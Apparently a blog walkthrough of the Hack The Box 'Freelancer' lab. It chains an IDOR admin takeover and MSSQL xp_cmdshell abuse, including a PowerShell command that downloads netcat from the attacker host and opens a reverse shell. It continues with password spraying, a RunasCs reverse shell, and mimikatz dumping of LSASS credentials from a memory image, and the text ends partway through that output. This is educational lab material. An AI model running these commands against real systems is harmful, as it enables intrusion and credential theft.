ryuki's blog

Freelancer

Oct 05, 202435 min read

Machine Card listing Freelancer as a hard Windows box

Reconnaissance

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.25.5
|_http-server-header: nginx/1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-30 23:33:53Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
55297/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   10.129.229.97\SQLEXPRESS:
|     Target_Name: FREELANCER
|     NetBIOS_Domain_Name: FREELANCER
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: freelancer.htb
|     DNS_Computer_Name: DC.freelancer.htb
|     DNS_Tree_Name: freelancer.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-30T23:32:07
|_Not valid after:  2054-09-30T23:32:07
| ms-sql-info:
|   10.129.229.97\SQLEXPRESS:
|     Instance name: SQLEXPRESS
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 55297
|     Named pipe: \\10.129.229.97\pipe\MSSQL$SQLEXPRESS\sql\query
|_    Clustered: false
|_ssl-date: 2024-09-30T23:34:53+00:00; +5h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time:
|   date: 2024-09-30T23:34:47
|_  start_date: N/A
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Based on the nmap scan it looks like a Domain Controller. HTTP and LDAP already expose a domain name freelancer.htb and the hostname dc.freelancer.htb, that I add both to my /etc/hosts before having a closer look.

HTTP

Webpage showing a platform to find jobs

The webpage for Freelancer is a job board. It allows so search for new jobs, register as a freelancer or an employer and contact the company behind the website. Registering as a new freelancer works and I can apply to any of the jobs.

Clicking on the profile picture of an employer within the job view let’s me access their profile. It also allows me to view comments from other users and post new ones. Within the URI /accounts/profile/visit/4/ I can see a numerical ID and try to change it. This let’s me enumerate the users on the platform starting at 2, the admin, and seemingly stopping at 15. My own user is not part of the list, so there might be a larger gap.

Screenshot of the Freelancer webpage with the ID 2 highlighted in the URL and the profile of the administrator visible

Trying to register as an employer already mentions that newly created accounts will be inactive and someone reviews the account details and then get in touch via mail. The required fields are the exact same ones as seen previously while registering as freelancer.

Form asking for account information and showing a informational message regarding manual activation

After accepting the T’s & C’s and clicking Register, I’m redirected to the login page but trying to login only shows an error message because the account is not activated yet. Next I’ll try to reset the password for the newly created account. If lucky this is an edge case, that was not anticipated and the account may change from locked/inactive into another state.

Account recovery form asking for a username and the security questions

Submitting the account name including the three security questions, I’m asked to set a new password and then I’m being redirected back to the login prompt. This time the login works and I can access the dashboard, where I can manage my job postings and applicants.

Screenshot showing the dashboard after logging in

Initial Access

The most interesting feature on the dashboard is QR-Code since this creates a new QR code to be used to login without providing a password within the next 5 minutes.

Screenshot showing a generated QR code for the authentication

Downloading and parsing the QR code returns a link like http://freelancer.htb/accounts/login/otp/MTAwMTA=/2708b97d6275eb51adcba4aa46505887/, containing a base64 string and a hex string that changes everytime. Decoding MTAwMTA= from base64 shows 10010 and this looks a lot like an account ID.
With the previously found way to enumerate accounts, I check this ID and it does return my own profile page.

Screenshot of my own profile page with the ID from the QR code highlighted

In order to take over the admin account, I generate a new QR code and replace the encoded ID with the base64 encoded version of 2: Mg==. After using the modified link I’m succesfully logged in as admin.

Profile Page after being logged in as admin

Being the administrator does not grant me additional privileges on the job board, but I can now access /admin where I find an administrator dashboard for the page. On there, I can view all objects (freelancers, employers, jobs posted, …) within the database of the job board. Most interesting for me are the employers. Checking them out one by one, I can find their password hashes.
Neither the password for johnHalond nor tomHazard, the two only accounts with a freelancer.htb mail, do crack with hashcat.

Screenshot showing the hash in the database visible from the webview

Execution

On the dashboard there’s also link that opens a SQL Terminal through which I can query the database directly. The queries are executed in the context of the user Freelancer_webapp_user.

Screenshot of the Admin dashboard with the link to the SQL Terminal highlighted. The result of the query 'SELECT username()'

Checking if I can impersonate any other user1 returns that I can run queries as sa, effectively being administrator of the MSSQL service.

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'

I proceed to enable xp_cmdshell to run system commands on the remote server and download a precompiled netcat binary to the machine to get a reverse shell. Executing the query grants me a shell as freelancer\sql_svc.

EXECUTE AS login = 'sa'
 
EXEC sp_configure 'show advanced options', '1'; RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE
 
EXEC master..xp_cmdshell 'mkdir C:\tools; powershell -c "iwr http://10.10.10.10/nc64.exe -useba -outfile C:\tools\nc64.exe; C:\tools\nc64.exe 10.10.10.10 9000 -e powershell.exe"'

Privilege Escalation

Shell as mikasaAckerman

Within the Downloads folder of the sql_svc user I find a configuration file that lists the password for the account as IL0v3ErenY3ager, but trying to use it to authenticate errors out.

type C:\users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True

I decide to list the users and their description to get an overview. One particular account catches my eye, because the description lists it as Database Developer. I decide to spray the password with a list of the users to see if anything matches nonetheless.

dsquery user -limit 0 | dsget user -samid -desc
  desc                                                                  samid              
  Built-in account for administering the computer/domain                Administrator      
  Built-in account for guest access to the computer/domain              Guest              
  Key Distribution Center Service Account                               krbtgt             
  Database Developer                                                    mikasaAckerman     
                                                                        sshd               
  SQL Backup Operator Account for Temp Schudeled SQL Express Backups    SQLBackupOperator  
  MSSQL Database Domain Account                                         sql_svc            
  IT Support Technician                                                 lorra199           
  System Analyzer                                                       maya.artmes        
  Department Manager                                                    michael.williams   
  IT Support                                                            sdavis             
  Software Developer                                                    d.jones            
  Software Developer                                                    jen.brown          
  Human Resources Specialist                                            taylor             
  Executive Manager                                                     jmartinez          
  WSGI Manager                                                          olivia.garcia      
  System Analyzer                                                       dthomas            
  Datacenter Manager                                                    sophia.h           
  DJango Developer                                                      Ethan.l            
  Active Directory Trusts Manager                                       wwalker            
  Active Directory Accounts Operator                                    jgreen             
  Active Directory Accounts Operator                                    evelyn.adams       
                                                                        hking              
  DJango Developer                                                      alex.hill          
                                                                        samuel.turner      
  Site Reliability Engineer (SRE)                                       ereed              
  Site Reliability Engineer (SRE)                                       leon.sk            
  IT Technician                                                         carol.poland       
  System Reliability Monitor (SRM) & Account Operator                   lkazanof

As already hoped, the password works for the account mikasaAckerman and I can proceed to pivot to this account.

nxc smb freelancer.htb -d 'freelancer' -u users.txt -p 'IL0v3ErenY3ager' --continue-on-success
SMB         10.129.229.97   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.97   445    DC               [-] freelancer\Administrator:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\Guest:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\krbtgt:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [+] freelancer\mikasaAckerman:IL0v3ErenY3ager 
SMB         10.129.229.97   445    DC               [-] freelancer\sshd:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\SQLBackupOperator:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\sql_svc:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\lorra199:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\maya.artmes:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\michael.williams:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\sdavis:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\d.jones:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\jen.brown:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\taylor:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\jmartinez:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\olivia.garcia:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\dthomas:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\sophia.h:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\Ethan.l:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\wwalker:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\jgreen:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\evelyn.adams:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\hking:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\alex.hill:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\samuel.turner:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\ereed:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\leon.sk:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\carol.poland:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\lkazanof:IL0v3ErenY3ager STATUS_LOGON_FAILURE

To change my current user, I upload RunasCs.exe to the machine and execute it with the credentials for mikasaAckerman. By using the -r switch and providing an IP and port, I can get a reverse shell.
This allows me to read the first flag.

C:\tools\RunasCs.exe mikasaAckerman 'IL0v3ErenY3ager' powershell.exe -r 10.10.10.10:9001
 
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-4b139$\Default
[+] Async process 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 3812 created in background.

Shell as lorra199

On the desktop there’s a text file called mail.txt and a rather large file MEMORY.7z. Reading the mail explains that it’s a memory dump of DATACENTER-2019.

mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,

For further inspection I transfer the memory dump to my machine. To do so, I’ll mount a SMB share from my host. The security settings require authentication and therefore I specify some credentials when setting up the SMB share.

# On my local machine
mkdir smb && cd smb
 
impacket-smbserver -username test -password test -smb2support share $(pwd)
 
# On the remote machine
net use n: \\10.10.10.10\share /user:test test
 
cp MEMORY.7z n:

Since my goto tool for memory analysis volatility3 errors out (not anymore…) and volatility2.6 does also not produce any meaningful output, I decide to switch to my Windows VM to use WinDbg in combination with mimikatz to check for credentials/hashes2.

I load the memory image into WinDbg with Open dump file and the tool starts to download the necessary symbol tables. Then I load the mimikatz DLL mimilib into the debugger, search for the lsass process and switch to it.

1: kd> .load C:\Users\ryuki\Documents\tools\mimikatz\x64\mimilib.dll
 
  .#####.   mimikatz 2.2.0 (x64) built on Sep 19 2022 17:44:00
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 17763
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */
 
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
 
1: kd> !process 0 0 lsass.exe
PROCESS ffffbc83a93e7080
    SessionId: 0  Cid: 0248    Peb: c4fb6df000  ParentCid: 01c8
    DirBase: 0cfd2002  ObjectTable: ffffd3067d89ab00  HandleCount: 1051.
    Image: lsass.exe
 
1: kd> .process /r /p ffffbc83a93e7080
Implicit process is now ffffbc83`a93e7080
Loading User Symbols
................................................................
...................
 
************* Symbol Loading Error Summary **************
Module name            Error
myfault                The system cannot find the file specified
 
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
 
1: kd> !mimikatz
 
DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
 
DPAPI System
============
full: cf1bc407d272ade7e781f17f6f3a3fc2b82d16bc6d210ab98889fac8829a1526a5d6a2f76f8f9d53
m/u : cf1bc407d272ade7e781f17f6f3a3fc2b82d16bc / 6d210ab98889fac8829a1526a5d6a2f76f8f9d53
 
SekurLSA
========
 
Authentication Id : 0 ; 45311 (00000000:0000b0ff)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : 
Logon Time        : 04/10/2023 19:30:10
SID               : S-1-5-90-0-1
	msv : 
	 [00000003] Primary
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * NTLM     : 1003ddfa0a470017188b719e1eaae709
	 * SHA1     : 4ce0bf0f488248a0858d1eacbe75529994ba4999
	tspkg : KO
	wdigest : 
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * Password : (null)
	kerberos : 
	 * Username : DATACENTER-2019$
	 * Domain   : freelancer.htb
	 * Password : a6 80 a4 af 30 e0 45 06 64 19 c6 f5 2c 07 3d 73 82 41 fa 9d 1c ff 59 1b 95 15 35 cf f5 32 0b 10 9e 65 22 0c 1c 9e 4f a8 91 c9 d1 ee 22 e9 90 c4 76 6b 3e b6 3f b3 e2 da 67 eb d1 98 30 d4 5c 0b a4 e6 e6 df 93 18 0c 0a 74 49 75 06 55 ed d7 8e b8 48 f7 57 68 9a 68 89 f3 f8 f7 f6 cf 53 e1 19 6a 52 8a 7c d1 05 a2 ec ce fb 2a 17 ae 5a eb f8 49 02 e3 26 6b bc 5d b6 e3 71 62 7b b0 82 8c 2a 36 4c b0 11 19 cf 3d 2c 70 d9 20 32 8c 81 4c ad 07 f2 b5 16 14 3d 86 d0 e8 8e f1 50 40 67 81 5e d7 0e 9c cb 86 1f 57 39 4d 94 ba 9f 77 19 8e 9d 76 ec ad f8 cd b1 af da 48 b8 1f 81 d8 4a c6 25 30 38 9c b6 4d 41 2b 78 4f 0f 73 35 51 a6 2e c0 86 2a c2 fb 26 1b 43 d7 99 90 d4 e2 bf bf 4d 7d 4e eb 90 cc d7 dc 9b 48 20 28 c2 14 3c 5a 60 10 
	 * Key List
	   aes256_hmac       9cc4c2603a3ed67348ee18025dc10cdea94e9427fc4f6e02fca57f1eb89dead7
	   aes128_hmac       e2166c1e1a5f29f378c4751039869624
	   rc4_hmac_nt       1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old      1003ddfa0a470017188b719e1eaae709
	   rc4_md4           1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_nt_exp   1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old_exp  1003ddfa0a470017188b719e1eaae709
 
	ssp : 
	masterkey : 
	credman : 
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DATACENTER-2019$
Domain            : FREELANCER
Logon Server      : 
Logon Time        : 04/10/2023 19:30:09
SID               : S-1-5-20
	msv : 
	 [00000003] Primary
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * NTLM     : 1003ddfa0a470017188b719e1eaae709
	 * SHA1     : 4ce0bf0f488248a0858d1eacbe75529994ba4999
	tspkg : KO
	wdigest : 
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * Password : (null)
	kerberos : 
	 * Username : datacenter-2019$
	 * Domain   : FREELANCER.HTB
	 * Password : (null)
	 * Key List
	   aes256_hmac       6e4859faf9de3d1de33fdd2a0bb4591306b5d64f0d8ec2de342d49cf470cbc1f
	   rc4_hmac_nt       1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old      1003ddfa0a470017188b719e1eaae709
	   rc4_md4           1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_nt_exp   1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old_exp  1003ddfa0a470017188b719e1eaae709
 
	ssp : 
	masterkey : 
	credman : 
 
Authentication Id : 0 ; 27279 (00000000:00006a8f)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : 
Logon Time        : 04/10/2023 19:30:08
SID               : S-1-5-96-0-1
	msv : 
	 [00000003] Primary
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * NTLM     : 1003ddfa0a470017188b719e1eaae709
	 * SHA1     : 4ce0bf0f488248a0858d1eacbe75529994ba4999
	tspkg : KO
	wdigest : 
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * Password : (null)
	kerberos : 
	 * Username : DATACENTER-2019$
	 * Domain   : freelancer.htb
	 * Password : a6 80 a4 af 30 e0 45 06 64 19 c6 f5 2c 07 3d 73 82 41 fa 9d 1c ff 59 1b 95 15 35 cf f5 32 0b 10 9e 65 22 0c 1c 9e 4f a8 91 c9 d1 ee 22 e9 90 c4 76 6b 3e b6 3f b3 e2 da 67 eb d1 98 30 d4 5c 0b a4 e6 e6 df 93 18 0c 0a 74 49 75 06 55 ed d7 8e b8 48 f7 57 68 9a 68 89 f3 f8 f7 f6 cf 53 e1 19 6a 52 8a 7c d1 05 a2 ec ce fb 2a 17 ae 5a eb f8 49 02 e3 26 6b bc 5d b6 e3 71 62 7b b0 82 8c 2a 36 4c b0 11 19 cf 3d 2c 70 d9 20 32 8c 81 4c ad 07 f2 b5 16 14 3d 86 d0 e8 8e f1 50 40 67 81 5e d7 0e 9c cb 86 1f 57 39 4d 94 ba 9f 77 19 8e 9d 76 ec ad f8 cd b1 af da 48 b8 1f 81 d8 4a c6 25 30 38 9c b6 4d 41 2b 78 4f 0f 73 35 51 a6 2e c0 86 2a c2 fb 26 1b 43 d7 99 90 d4 e2 bf bf 4d 7d 4e eb 90 cc d7 dc 9b 48 20 28 c2 14 3c 5a 60 10 
	 * Key List
	   aes256_hmac       9cc4c2603a3ed67348ee18025dc10cdea94e9427fc4f6e02fca57f1eb89dead7
	   aes128_hmac       e2166c1e1a5f29f378c4751039869624
	   rc4_hmac_nt       1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old      1003ddfa0a470017188b719e1eaae709
	   rc4_md4           1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_nt_exp   1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old_exp  1003ddfa0a470017188b719e1eaae709
 
	ssp : 
	masterkey : 
	credman : 
 
Authentication Id : 0 ; 27269 (00000000:00006a85)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : 
Logon Time        : 04/10/2023 19:30:08
SID               : S-1-5-96-0-0
	msv : 
	 [00000003] Primary
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * NTLM     : 1003ddfa0a470017188b719e1eaae709
	 * SHA1     : 4ce0bf0f488248a0858d1eacbe75529994ba4999
	tspkg : KO
	wdigest : 
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * Password : (null)
	kerberos : 
	 * Username : DATACENTER-2019$
	 * Domain   : freelancer.htb
	 * Password : a6 80 a4 af 30 e0 45 06 64 19 c6 f5 2c 07 3d 73 82 41 fa 9d 1c ff 59 1b 95 15 35 cf f5 32 0b 10 9e 65 22 0c 1c 9e 4f a8 91 c9 d1 ee 22 e9 90 c4 76 6b 3e b6 3f b3 e2 da 67 eb d1 98 30 d4 5c 0b a4 e6 e6 df 93 18 0c 0a 74 49 75 06 55 ed d7 8e b8 48 f7 57 68 9a 68 89 f3 f8 f7 f6 cf 53 e1 19 6a 52 8a 7c d1 05 a2 ec ce fb 2a 17 ae 5a eb f8 49 02 e3 26 6b bc 5d b6 e3 71 62 7b b0 82 8c 2a 36 4c b0 11 19 cf 3d 2c 70 d9 20 32 8c 81 4c ad 07 f2 b5 16 14 3d 86 d0 e8 8e f1 50 40 67 81 5e d7 0e 9c cb 86 1f 57 39 4d 94 ba 9f 77 19 8e 9d 76 ec ad f8 cd b1 af da 48 b8 1f 81 d8 4a c6 25 30 38 9c b6 4d 41 2b 78 4f 0f 73 35 51 a6 2e c0 86 2a c2 fb 26 1b 43 d7 99 90 d4 e2 bf bf 4d 7d 4e eb 90 cc d7 dc 9b 48 20 28 c2 14 3c 5a 60 10 
	 * Key List
	   aes256_hmac       9cc4c2603a3ed67348ee18025dc10cdea94e9427fc4f6e02fca57f1eb89dead7
	   aes128_hmac       e2166c1e1a5f29f378c4751039869624
	   rc4_hmac_nt       1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old      1003ddfa0a470017188b719e1eaae709
	   rc4_md4           1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_nt_exp   1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old_exp  1003ddfa0a470017188b719e1eaae709
 
	ssp : 
	masterkey : 
	credman : 
 
Authentication Id : 0 ; 429726 (00000000:00068e9e)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : FREELANCER
Logon Server      : DC
Logon Time        : 04/10/2023 19:32:52
SID               : S-1-5-21-3542429192-2036945976-3483670807-500
	msv : 
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : FREELANCER
	 * NTLM     : acb3617b6b9da5dc7778092bdea6f3b8
	 * SHA1     : ccbee099f360c2fd26b8a3953d9b37893bcaa467
	 * DPAPI    : 587f524a5c66053caa5e00000000acb3
	tspkg : KO
	wdigest : 
	 * Username : Administrator
	 * Domain   : FREELANCER
	 * Password : (null)
	kerberos : 
	 * Username : Administrator
	 * Domain   : FREELANCER.HTB
	 * Password : v3ryS0l!dP@sswd#29
	 * Key List
	   aes256_hmac       707d2a08632dec5b412a8a77d52b24004c301b694ef640630a5f7141d71b7969
	   aes128_hmac       bce0bf149aded161c203a597fcbefcb5
	   rc4_hmac_nt       acb3617b6b9da5dc7778092bdea6f3b8
	   rc4_hmac_old      acb3617b6b9da5dc7778092bdea6f3b8
	   rc4_md4           acb3617b6b9da5dc7778092bdea6f3b8
	   rc4_hmac_nt_exp   acb3617b6b9da5dc7778092bdea6f3b8
	   rc4_hmac_old_exp  acb3617b6b9da5dc7778092bdea6f3b8
 
	ssp : 
	masterkey : 
	credman : 
 
Authentication Id : 0 ; 181266 (00000000:0002c412)
Session           : Interactive from 1
User Name         : liza.kazanof
Domain            : FREELANCER
Logon Server      : DC
Logon Time        : 04/10/2023 19:31:23
SID               : S-1-5-21-3542429192-2036945976-3483670807-1121
	msv : 
	 [00000003] Primary
	 * Username : liza.kazanof
	 * Domain   : FREELANCER
	 * NTLM     : 6bc05d2a5ebf34f5b563ff233199dc5a
	 * SHA1     : 93eff904639f3b40b0f05f9052c48473ecd2757e
	 * DPAPI    : 953b826b646b373f4972000000006bc0
	tspkg : KO
	wdigest : 
	 * Username : liza.kazanof
	 * Domain   : FREELANCER
	 * Password : (null)
	kerberos : 
	 * Username : liza.kazanof
	 * Domain   : FREELANCER.HTB
	 * Password : (null)
	 * Key List
	   aes256_hmac       8dd82890a73d1e0aee90290425edff274a46b331908637c5b49b636408c5f4b1
	   rc4_hmac_nt       6bc05d2a5ebf34f5b563ff233199dc5a
	   rc4_hmac_old      6bc05d2a5ebf34f5b563ff233199dc5a
	   rc4_md4           6bc05d2a5ebf34f5b563ff233199dc5a
	   rc4_hmac_nt_exp   6bc05d2a5ebf34f5b563ff233199dc5a
	   rc4_hmac_old_exp  6bc05d2a5ebf34f5b563ff233199dc5a
 
	ssp : 
	masterkey : 
	 [00000000]
	 * GUID      :	{b3859cd0-59d2-4857-8a5f-98d469e5d8d2}
	 * Time      :	04/10/2023 17:31:41
	 * MasterKey :	e88b706951f959a337fdf1a4d2eb5c61505435464ebdf135eb33105155da02279ca34659ac5892fe35302fa8695a35e0db93fdfa08f08b18d4e30f2db01e2e38
	credman : 
 
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : 
Logon Time        : 04/10/2023 19:30:12
SID               : S-1-5-19
	msv : 
	tspkg : KO
	wdigest : 
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos : 
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp : 
	masterkey : 
	credman : 
 
Authentication Id : 0 ; 45365 (00000000:0000b135)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : 
Logon Time        : 04/10/2023 19:30:10
SID               : S-1-5-90-0-1
	msv : 
	 [00000003] Primary
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * NTLM     : 1003ddfa0a470017188b719e1eaae709
	 * SHA1     : 4ce0bf0f488248a0858d1eacbe75529994ba4999
	tspkg : KO
	wdigest : 
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * Password : (null)
	kerberos : 
	 * Username : DATACENTER-2019$
	 * Domain   : freelancer.htb
